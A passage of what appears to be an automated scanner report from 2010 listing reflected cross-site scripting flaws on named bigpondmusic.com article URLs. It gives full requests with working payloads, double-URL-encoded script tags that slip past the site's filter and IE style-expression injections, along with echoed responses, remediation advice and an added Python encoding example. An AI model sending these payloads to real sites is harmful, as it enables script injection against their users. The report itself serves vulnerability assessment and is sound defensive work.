<title>Bieber, Eminem, GaGa - The 2
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/news/article/5079/bieber-eminem-gaga-the-2010-amas-winners-list?80616"style="x:expression(alert(1))"94e4edbecb9=1" />
...[SNIP]...

2.363. http://bigpondmusic.com/news/article/5080/wavves-arrested-on-marijuana-charges [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /news/article/5080/wavves-arrested-on-marijuana-charges

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a4b3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e914b3f2cd5a was submitted in the REST URL parameter 1. This input was echoed as 1a4b3"><script>alert(1)</script>914b3f2cd5a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /news1a4b3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e914b3f2cd5a/article/5080/wavves-arrested-on-marijuana-charges HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:14:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88672


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/news1a4b3"><script>alert(1)</script>914b3f2cd5a/article/5080/wavves-arrested-on-marijuana-charges" />
...[SNIP]...

2.364. http://bigpondmusic.com/news/article/5080/wavves-arrested-on-marijuana-charges [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /news/article/5080/wavves-arrested-on-marijuana-charges

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 35399'%3b6d81c4247e2 was submitted in the REST URL parameter 1. This input was echoed as 35399';6d81c4247e2 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news35399'%3b6d81c4247e2/article/5080/wavves-arrested-on-marijuana-charges HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:14:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87861


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
strabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'news35399';6d81c4247e2';
   s.prop4 = 'article';
   s.prop5 = '5080';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.ch
...[SNIP]...

2.365. http://bigpondmusic.com/news/article/5080/wavves-arrested-on-marijuana-charges [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /news/article/5080/wavves-arrested-on-marijuana-charges

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4db16%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef2dd4865812 was submitted in the REST URL parameter 2. This input was echoed as 4db16"><script>alert(1)</script>f2dd4865812 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /news/article4db16%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef2dd4865812/5080/wavves-arrested-on-marijuana-charges HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:15:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88136


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/news/article4db16"><script>alert(1)</script>f2dd4865812/5080/wavves-arrested-on-marijuana-charges" />
...[SNIP]...

2.366. http://bigpondmusic.com/news/article/5080/wavves-arrested-on-marijuana-charges [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /news/article/5080/wavves-arrested-on-marijuana-charges

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fff5f'%3b1b65fff739f was submitted in the REST URL parameter 2. This input was echoed as fff5f';1b65fff739f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/articlefff5f'%3b1b65fff739f/5080/wavves-arrested-on-marijuana-charges HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:15:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88025


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
t,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'news';
   s.prop4 = 'articlefff5f';1b65fff739f';
   s.prop5 = '5080';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel + '|' + s.prop4 +
...[SNIP]...

2.367. http://bigpondmusic.com/news/article/5080/wavves-arrested-on-marijuana-charges [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /news/article/5080/wavves-arrested-on-marijuana-charges

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9144%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1791b1e334c was submitted in the REST URL parameter 4. This input was echoed as b9144"><script>alert(1)</script>1791b1e334c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4, as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out, and should HTML-encode the value for the attribute context at the point of output regardless of validation: the character blocklist is at best defence in depth.

Request

GET /news/article/5080/wavves-arrested-on-marijuana-chargesb9144%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1791b1e334c HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:15:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 104831


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Wavves arrested on marijuana
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/news/article/5080/wavves-arrested-on-marijuana-chargesb9144"><script>alert(1)</script>1791b1e334c" />
...[SNIP]...

2.368. http://bigpondmusic.com/news/article/5080/wavves-arrested-on-marijuana-charges [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /news/article/5080/wavves-arrested-on-marijuana-charges

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4a655%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527a8860a0f366 was submitted in the REST URL parameter 4. This input was echoed as 4a655'style='x:expression(alert(1))'a8860a0f366 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression() inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers; the underlying injection into the attribute is browser-independent.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4, as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out, and should HTML-encode the value for the attribute context at the point of output regardless of validation: the character blocklist is at best defence in depth.

Request

GET /news/article/5080/wavves-arrested-on-marijuana-charges4a655%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527a8860a0f366 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:15:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 104615


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Wavves arrested on marijuana
...[SNIP]...
<link rel='canonical' href='http://bigpondmusic.com/news/article/5080/wavves-arrested-on-marijuana-charges4a655'style='x:expression(alert(1))'a8860a0f366' />
...[SNIP]...

2.369. http://bigpondmusic.com/news/article/5080/wavves-arrested-on-marijuana-charges [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /news/article/5080/wavves-arrested-on-marijuana-charges

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8cc83"style%3d"x%3aexpression(alert(1))"96682312f66 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8cc83"style="x:expression(alert(1))"96682312f66 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression() inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers; the underlying injection into the attribute is browser-independent.

Request

GET /news/article/5080/wavves-arrested-on-marijuana-charges?8cc83"style%3d"x%3aexpression(alert(1))"96682312f66=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:14:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 104502


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Wavves arrested on marijuana
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/news/article/5080/wavves-arrested-on-marijuana-charges?8cc83"style="x:expression(alert(1))"96682312f66=1" />
...[SNIP]...

2.370. http://bigpondmusic.com/news/article/5081/lykke-li-gets-ready-for-wounded-rhymes [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /news/article/5081/lykke-li-gets-ready-for-wounded-rhymes

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2742c'%3b5518d4ea8c was submitted in the REST URL parameter 1. This input was echoed as 2742c';5518d4ea8c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where that cannot be avoided, the value must be encoded for a JavaScript string literal at the point of output (quotes, backslashes, line terminators and the < and > characters escaped as \xHH or \uHHHH sequences); HTML-encoding alone does not protect a script context.
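Worked example, added here and not part of the original report: a small Python script that reproduces the s.prop4 / s.channel assignment into which issue 2.370 (and the identical JavaScript-string findings on the other article URLs in this section) is reflected, with raw concatenation beside a JavaScript-string encoder, and a scanner that tells whether the literal was terminated early. The payload is the one the report submitted for the previous article; the encoder, the scanner and the function names are this example's own, not the site's code.

```python
"""Added example (not code from the report or from the site). Models the
analytics assignment s.prop4 = '<route value>' that the findings reflect into,
with raw concatenation next to a JavaScript-string encoder, and checks each
line with a small literal scanner. Function names are illustrative."""

# Route value as the web server decodes it from /news/articlefff5f'%3b1b65fff739f/...
PAYLOAD = "articlefff5f';1b65fff739f"


def vulnerable_assignment(value):
    """The page's pattern: the decoded route value is concatenated into the script."""
    return "s.prop4 = '" + value + "';"


def js_string_encode(value):
    # Escape for a JavaScript string literal. Everything outside a small safe set
    # becomes \xHH or \uHHHH (a surrogate pair above U+FFFF), so quotes, backslashes,
    # line terminators and < > can neither close the literal nor, via "</script>",
    # close the enclosing script element. HTML-encoding would not achieve this.
    out = []
    for ch in value:
        cp = ord(ch)
        if (ch.isalnum() and cp < 128) or ch in " ,._-":
            out.append(ch)
        elif cp < 256:
            out.append("\\x%02x" % cp)
        elif cp <= 0xFFFF:
            out.append("\\u%04x" % cp)
        else:
            hi, lo = divmod(cp - 0x10000, 0x400)
            out.append("\\u%04x\\u%04x" % (0xD800 + hi, 0xDC00 + lo))
    return "".join(out)


def safe_assignment(value):
    return "s.prop4 = '" + js_string_encode(value) + "';"


def literal_body(line):
    """Body of the first single-quoted literal in line, honouring backslash
    escapes the way a JavaScript tokenizer does; ValueError if never closed."""
    start = line.index("'") + 1
    i = start
    while i < len(line):
        if line[i] == "\\":
            i += 2
            continue
        if line[i] == "'":
            return line[start:i]
        i += 1
    raise ValueError("unterminated string literal")


def string_terminates_early(line):
    """True when the literal closes before the template's own closing quote,
    leaving attacker-controlled text outside the string, where it runs as code."""
    body = literal_body(line)
    close = line.index("'") + 1 + len(body)   # index of the closing quote
    return line[close + 1:] != ";"


def roundtrips(value):
    """Sanity check for BMP text: undoing the escapes (Python's unicode_escape
    codec understands the same \\xHH / \\uHHHH forms) gives the original value."""
    return js_string_encode(value).encode("ascii").decode("unicode_escape") == value


if __name__ == "__main__":
    for line in (vulnerable_assignment(PAYLOAD), safe_assignment(PAYLOAD)):
        print("terminates early" if string_terminates_early(line) else "intact", line)
```

Run directly, the raw line closes the literal after articlefff5f and leaves the rest of the payload outside the string, while the encoded line is a single intact literal that still decodes to the same value; the scanner reports the difference the same way a browser's tokenizer would see it.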

Request

GET /news2742c'%3b5518d4ea8c/article/5081/lykke-li-gets-ready-for-wounded-rhymes HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:15:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88562


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
strabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'news2742c';5518d4ea8c';
   s.prop4 = 'article';
   s.prop5 = '5081';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.ch
...[SNIP]...

2.371. http://bigpondmusic.com/news/article/5081/lykke-li-gets-ready-for-wounded-rhymes [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /news/article/5081/lykke-li-gets-ready-for-wounded-rhymes

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9d2d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6b41e231f03 was submitted in the REST URL parameter 1. This input was echoed as a9d2d"><script>alert(1)</script>6b41e231f03 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1, as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out, and should HTML-encode the value for the attribute context at the point of output regardless of validation: the character blocklist is at best defence in depth.

Request

GET /newsa9d2d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6b41e231f03/article/5081/lykke-li-gets-ready-for-wounded-rhymes HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:15:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88065


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/newsa9d2d"><script>alert(1)</script>6b41e231f03/article/5081/lykke-li-gets-ready-for-wounded-rhymes" />
...[SNIP]...

2.372. http://bigpondmusic.com/news/article/5081/lykke-li-gets-ready-for-wounded-rhymes [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /news/article/5081/lykke-li-gets-ready-for-wounded-rhymes

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c1573'%3bb4178195f66 was submitted in the REST URL parameter 2. This input was echoed as c1573';b4178195f66 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where that cannot be avoided, the value must be encoded for a JavaScript string literal at the point of output (quotes, backslashes, line terminators and the < and > characters escaped as \xHH or \uHHHH sequences); HTML-encoding alone does not protect a script context.

Request

GET /news/articlec1573'%3bb4178195f66/5081/lykke-li-gets-ready-for-wounded-rhymes HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:15:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
